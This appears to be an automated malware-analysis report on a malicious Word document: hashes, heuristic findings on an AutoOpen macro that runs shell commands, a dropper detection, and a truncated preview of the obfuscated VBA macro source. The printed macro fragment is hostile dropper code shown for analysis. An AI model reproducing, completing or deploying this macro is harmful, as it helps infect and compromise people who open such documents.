Office (OLE) malware analysis — malicious · b69efd2ffc2451cf

MALICIOUS

Office (OLE)

179.5 KB Created: 2017-12-07 13:01:00 Authoring application: Microsoft Office Word First seen: 2018-02-07

MD5: 826ba951003ff3c96cf674d697801942 SHA-1: 23c1a1eb8e6296686fa0ad78065112bf1559b7b1 SHA-256: b69efd2ffc2451cfd2bf9afca4ee089e2ec7f0e4a0eae6cfb80a10e2ea806cdc

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious OLE document containing VBA macros. The 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic indicates that the AutoOpen macro is configured to execute a shell command. The ClamAV detection 'Img.Dropper.PhishingLure-6443153-0' suggests a phishing lure, likely a dropper. The embedded URL 'http://jAu+jAugjAu' is suspicious and likely part of the payload delivery mechanism.

Heuristics 6

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 183,808 bytes but its declared streams total only 78,506 bytes — 105,302 bytes (57%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://jAu+jAugjAu In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21067 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	21067 bytes
SHA-256: `b541722c81d4514a15a4bb8923279128d5eca084b717862425bb05df4ae99ff3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "WJdEVYqBY" Function DpXdvriAsZD() fEGEfCEvDff = Array(UCase("bVHUOdj" + "fECZddZNKWpkrM" + "nPAkzSTnQjhKdc" + "jUXFjMwwbF" + "qiAEbNOWUFOs"), UCase("iMRmtvSwkonU" + "mjmqRYiSc" + "nLEUvHIRVcnbT" + "KFjnkGqNkOahjd" + "pORCXiaoaWocX")) CLoHlSLvCh = Mid("oGLVPvT99bNTLS1rCo2bNPCGsnq%=iGQMi4Db", 23, 8) sNfBfrzjld = Array(UCase("lJIYPnwTDV" + "sdsdQqQYlulsOc" + "oRGNBAMcBminR" + "wzdZRmYzBt" + "llnizRuwWzhMpU"), UCase("fBqriDzznuITwq" + "oPNRPPZzBU" + "ruYRmnETGWIKL" + "mlzkrwzGCLRzX" + "jGEpWuM")) GtdMAvPSqZ = Array(UCase("saKMrfLsr" + "VzabqtNXidfN" + "YwRkRFQwdT" + "roPVszbzWijZEz" + "jJQwtmiEmQZvum"), UCase("msiikCdsfjB" + "rnsWNkTYGffZ" + "MjdESBhK" + "wovZPvCQlRsEnR" + "uMLbOUGMEWXSzn")) XtHSicQiYK = Array(UCase("tXPwRHVlY" + "NWYXzQAlRfOBc" + "OLRhIupsfjjFEo" + "VSNuLwkwDNS" + "ZrtBruQhFqnd"), UCase("zVqsouMMKvN" + "GRCdPOU" + "HPAmirKnGVfik" + "NbuEOSGaP" + "fBkdNDqcSoVhUE")) FwIiqzoXBCz = Mid("1NvrMbi1FfWWA9O%!!%GroQSZEWTiRuKqG3OkFN8jRN9p6", 16, 14) avEIOFmiwRF = Array(UCase("iUXwqEao" + "XVqtNjDYSk" + "GqFwaqbr" + "rcCcZmY" + "rapTYpDsiNwX"), UCase("wzPdGoOaV" + "cjliuTN" + "bIVhsuriBB" + "wccTksd" + "zSwJHVaMjnLJZ")) wPoNGoKrE = Array(UCase("wkYGoPiPp" + "bjLzCih" + "EHcHjZCfDMwvfG" + "pSiiUbjwluamU" + "dPFniQzlpDw"), UCase("IMWTuXU" + "VjUANXXKrMGniA" + "wrHzqsEdijQ" + "UaSADRaJw" + "EaKsmuczLVHmZc")) wcQXTHhtjkY = Array(UCase("hcENtzFaUqlAR" + "aEaAzJEmi" + "QWYhJOVLEaoi" + "GfdlbjhGTC" + "mOYwHZmu"), UCase("SwXaYQGUZvqbv" + "TVVXcCBfwUQ" + "vpZDfntlGKHDNL" + "MjYLhqjEblB" + "rrmzDKcV")) SUHIOMNsHuq = Mid("MLQ8J36OMiRsWThr64AWNzLHf1Vp6 dcsaV2D5mk", 30, 2) LZrVWDETE = Array(UCase("ZiBRDpRwEDkY" + "CVIqdBmh" + "zFJAjXvLhAqNd" + "ZstFndFoCVQv" + "NRIYpFmjvHDJt"), UCase("sVjiwZi" + "zkvwDhJDnjlh" + "uYcAHrGdkqwt" + "MSSnRVHiTYc" + "CEXrUTXMSwwHi")) ANJlFw = Array(UCase("vVPDhJXJN" + "JRZpzYIjE" + "lzRddCtU" + "EskpMRKI" + "zjLuOTss"), UCase("CnbubYJfz" + "mZfQDzI" + "YbNYoPAjXA" + "jwlljrjjKRMjj" + "HWjUQHvFuT")) GoBkwn = Array(UCase("kXUKWamv" + "hTqdjmuihMdw" + "DCWOcLfM" + "wUJOOGwLTzdVZ" + "swFHMCzwAOY"), UCase("RnHwbPWtWW" + "RXnkVsdUqd" + "dRWETKqzTv" + "upKDVYNwjGVco" + "YRbDWthpsJpb")) bXUaHUwlIjN = Mid("X8rGtXCsHIRNrFvFI5Xk2srjrEjTbkVn44TRvbwbdHB", 22, 7) BTJcLZSZb = Array(UCase("EdzLurAJp" + "FAovYXQwH" + "vjEhtRPH" + "viDSUiNhXQaMW" + "FBVvYskfHmHVY"), UCase("SSdctRtjBi" + "QKpsihzYoz" + "YVqOHQXRLzG" + "OFmzSFzVzmbIh" + "mYEHwjZmtHliJd")) rjzLucpiG = Array(UCase("wMCXCYbcwa" + "XEGszSHpi" + "usOvzBIEwB" + "tCRliiTEM" + "arKjSmps"), UCase("BAtCCTncFW" + "YCZDdCpGS" + "okWMTBEOfPTL" + "zNAzORqGNh" + "jYSGCPwiapMPX")) bpJGTMGc = Array(UCase("RwAazrOr" + "JHlMNlU" + "MqGBXrJWTcUuK" + "RUNHVadc" + "hsJwcIpCVWha"), UCase("fGuFrEjOuzsz" + "RzFQuKkEYJOvj" + "iawXckioG" + "QjZvXnuQw" + "rpwFcWpiGzjK")) mHjJuMK = Mid("cbIYIk2UUPpfC%=o^0j35OJmw90KNO5rfiIq", 8, 10) PYCjliaw = Array(UCase("iSjNaHzMfZqdD" + "occbDcdviwL" + "SllhmzdJj" + "GtmauXtsPZLWtz" + "kMuMmjlB"), UCase("oNazntAt" + "pVjpdiGCqimDws" + "UBkiztPVsbljw" + "FWZSbDbdvjLFkt" + "PHrVmdl")) aMvpivAB = Array(UCase("qCnvZPPL" + "srzKlojlOzw" + "WodtuGuwiJhFYi" + "krVBhbOzFFRkBB" + "jjMRTNJCfJ"), UCase("OtjKumCuwt" + "vQSHrYncVsvOZ" + "tGPjbpprMMVNvL" + "hGEapnvzLWk" + "CobTiJLAj")) KJBFls = Array(UCase("BzUUbuwvaCL" + "PGwIFmiB" + "iWEKiZqUBwcOj" + "qcTHFYw" + "tzzJcHtSpM"), UCase("qSaPKsUIbYD" + "wiCIjlidcqNd" + "MYzjaiIQ" + "pkQMIOkQWwpP" + "aZwMjLjDAFwIwU")) swwOr = Mid("kOvMuPi23iwmAXpTdT0fbj1jN", 15, 1) zjlRHwaf = Array(UCase("OVEDEDFmddczn" + "qnkLwHEJqbmD" + "tqDjKwusjWmi" + "tZsHmFBpcqZAC" + "jFidQBSLva"), UCase("RwttGRwcGNiQi" + "hCvRAijIaKnEt" + "hYidSOUGHw" + "ZbXvLEowoi" + "XtvvJJYiGBYcuh")) jpGfiHQtbdL = Array(UCase("ZAquSQtSsT" + "PtMTRorNwXk" + "BzhdpiTEK" + "MrWFuwihHGsDvq" + "joIQlVzomozlm"), UCase("nZPTVjU" + "LuviQQdVwCrlJq" + "nZYNCkRz" + "wdThdkZK" + "jcOVGFjLQq")) BPjjYEL = Array(UCase("FnciazBzT" + "PionbvKz" + "iaOGPInfnKvTj" + "zhMRfbEbdwPC" + "aYLntUjt"), UCase("qhMZnSNoXojzr" + "OiiWjGz" + "qMBMHcXCw" + "nGrfEGnlOoYbSJ" + "RwJPwzmsXqzY")) VVOdG = Mid("0fMcObJJN5TMdv36WhnBJ9znfKUukD%=Y ... (truncated)

SHA-256: b541722c81d4514a15a4bb8923279128d5eca084b717862425bb05df4ae99ff3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "WJdEVYqBY"
Function DpXdvriAsZD()
fEGEfCEvDff = Array(UCase("bVHUOdj" + "fECZddZNKWpkrM" + "nPAkzSTnQjhKdc" + "jUXFjMwwbF" + "qiAEbNOWUFOs"), UCase("iMRmtvSwkonU" + "mjmqRYiSc" + "nLEUvHIRVcnbT" + "KFjnkGqNkOahjd" + "pORCXiaoaWocX"))
CLoHlSLvCh = Mid("oGLVPvT99bNTLS1rCo2bNPCGsnq%=iGQMi4Db", 23, 8)
sNfBfrzjld = Array(UCase("lJIYPnwTDV" + "sdsdQqQYlulsOc" + "oRGNBAMcBminR" + "wzdZRmYzBt" + "llnizRuwWzhMpU"), UCase("fBqriDzznuITwq" + "oPNRPPZzBU" + "ruYRmnETGWIKL" + "mlzkrwzGCLRzX" + "jGEpWuM"))
GtdMAvPSqZ = Array(UCase("saKMrfLsr" + "VzabqtNXidfN" + "YwRkRFQwdT" + "roPVszbzWijZEz" + "jJQwtmiEmQZvum"), UCase("msiikCdsfjB" + "rnsWNkTYGffZ" + "MjdESBhK" + "wovZPvCQlRsEnR" + "uMLbOUGMEWXSzn"))
XtHSicQiYK = Array(UCase("tXPwRHVlY" + "NWYXzQAlRfOBc" + "OLRhIupsfjjFEo" + "VSNuLwkwDNS" + "ZrtBruQhFqnd"), UCase("zVqsouMMKvN" + "GRCdPOU" + "HPAmirKnGVfik" + "NbuEOSGaP" + "fBkdNDqcSoVhUE"))
FwIiqzoXBCz = Mid("1NvrMbi1FfWWA9O%!!%GroQSZEWTiRuKqG3OkFN8jRN9p6", 16, 14)
avEIOFmiwRF = Array(UCase("iUXwqEao" + "XVqtNjDYSk" + "GqFwaqbr" + "rcCcZmY" + "rapTYpDsiNwX"), UCase("wzPdGoOaV" + "cjliuTN" + "bIVhsuriBB" + "wccTksd" + "zSwJHVaMjnLJZ"))
wPoNGoKrE = Array(UCase("wkYGoPiPp" + "bjLzCih" + "EHcHjZCfDMwvfG" + "pSiiUbjwluamU" + "dPFniQzlpDw"), UCase("IMWTuXU" + "VjUANXXKrMGniA" + "wrHzqsEdijQ" + "UaSADRaJw" + "EaKsmuczLVHmZc"))
wcQXTHhtjkY = Array(UCase("hcENtzFaUqlAR" + "aEaAzJEmi" + "QWYhJOVLEaoi" + "GfdlbjhGTC" + "mOYwHZmu"), UCase("SwXaYQGUZvqbv" + "TVVXcCBfwUQ" + "vpZDfntlGKHDNL" + "MjYLhqjEblB" + "rrmzDKcV"))
SUHIOMNsHuq = Mid("MLQ8J36OMiRsWThr64AWNzLHf1Vp6  dcsaV2D5mk", 30, 2)
LZrVWDETE = Array(UCase("ZiBRDpRwEDkY" + "CVIqdBmh" + "zFJAjXvLhAqNd" + "ZstFndFoCVQv" + "NRIYpFmjvHDJt"), UCase("sVjiwZi" + "zkvwDhJDnjlh" + "uYcAHrGdkqwt" + "MSSnRVHiTYc" + "CEXrUTXMSwwHi"))
ANJlFw = Array(UCase("vVPDhJXJN" + "JRZpzYIjE" + "lzRddCtU" + "EskpMRKI" + "zjLuOTss"), UCase("CnbubYJfz" + "mZfQDzI" + "YbNYoPAjXA" + "jwlljrjjKRMjj" + "HWjUQHvFuT"))
GoBkwn = Array(UCase("kXUKWamv" + "hTqdjmuihMdw" + "DCWOcLfM" + "wUJOOGwLTzdVZ" + "swFHMCzwAOY"), UCase("RnHwbPWtWW" + "RXnkVsdUqd" + "dRWETKqzTv" + "upKDVYNwjGVco" + "YRbDWthpsJpb"))
bXUaHUwlIjN = Mid("X8rGtXCsHIRNrFvFI5Xk2srjrEjTbkVn44TRvbwbdHB", 22, 7)
BTJcLZSZb = Array(UCase("EdzLurAJp" + "FAovYXQwH" + "vjEhtRPH" + "viDSUiNhXQaMW" + "FBVvYskfHmHVY"), UCase("SSdctRtjBi" + "QKpsihzYoz" + "YVqOHQXRLzG" + "OFmzSFzVzmbIh" + "mYEHwjZmtHliJd"))
rjzLucpiG = Array(UCase("wMCXCYbcwa" + "XEGszSHpi" + "usOvzBIEwB" + "tCRliiTEM" + "arKjSmps"), UCase("BAtCCTncFW" + "YCZDdCpGS" + "okWMTBEOfPTL" + "zNAzORqGNh" + "jYSGCPwiapMPX"))
bpJGTMGc = Array(UCase("RwAazrOr" + "JHlMNlU" + "MqGBXrJWTcUuK" + "RUNHVadc" + "hsJwcIpCVWha"), UCase("fGuFrEjOuzsz" + "RzFQuKkEYJOvj" + "iawXckioG" + "QjZvXnuQw" + "rpwFcWpiGzjK"))
mHjJuMK = Mid("cbIYIk2UUPpfC%=o^0j35OJmw90KNO5rfiIq", 8, 10)
PYCjliaw = Array(UCase("iSjNaHzMfZqdD" + "occbDcdviwL" + "SllhmzdJj" + "GtmauXtsPZLWtz" + "kMuMmjlB"), UCase("oNazntAt" + "pVjpdiGCqimDws" + "UBkiztPVsbljw" + "FWZSbDbdvjLFkt" + "PHrVmdl"))
aMvpivAB = Array(UCase("qCnvZPPL" + "srzKlojlOzw" + "WodtuGuwiJhFYi" + "krVBhbOzFFRkBB" + "jjMRTNJCfJ"), UCase("OtjKumCuwt" + "vQSHrYncVsvOZ" + "tGPjbpprMMVNvL" + "hGEapnvzLWk" + "CobTiJLAj"))
KJBFls = Array(UCase("BzUUbuwvaCL" + "PGwIFmiB" + "iWEKiZqUBwcOj" + "qcTHFYw" + "tzzJcHtSpM"), UCase("qSaPKsUIbYD" + "wiCIjlidcqNd" + "MYzjaiIQ" + "pkQMIOkQWwpP" + "aZwMjLjDAFwIwU"))
swwOr = Mid("kOvMuPi23iwmAXpTdT0fbj1jN", 15, 1)
zjlRHwaf = Array(UCase("OVEDEDFmddczn" + "qnkLwHEJqbmD" + "tqDjKwusjWmi" + "tZsHmFBpcqZAC" + "jFidQBSLva"), UCase("RwttGRwcGNiQi" + "hCvRAijIaKnEt" + "hYidSOUGHw" + "ZbXvLEowoi" + "XtvvJJYiGBYcuh"))
jpGfiHQtbdL = Array(UCase("ZAquSQtSsT" + "PtMTRorNwXk" + "BzhdpiTEK" + "MrWFuwihHGsDvq" + "joIQlVzomozlm"), UCase("nZPTVjU" + "LuviQQdVwCrlJq" + "nZYNCkRz" + "wdThdkZK" + "jcOVGFjLQq"))
BPjjYEL = Array(UCase("FnciazBzT" + "PionbvKz" + "iaOGPInfnKvTj" + "zhMRfbEbdwPC" + "aYLntUjt"), UCase("qhMZnSNoXojzr" + "OiiWjGz" + "qMBMHcXCw" + "nGrfEGnlOoYbSJ" + "RwJPwzmsXqzY"))
VVOdG = Mid("0fMcObJJN5TMdv36WhnBJ9znfKUukD%=Y
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.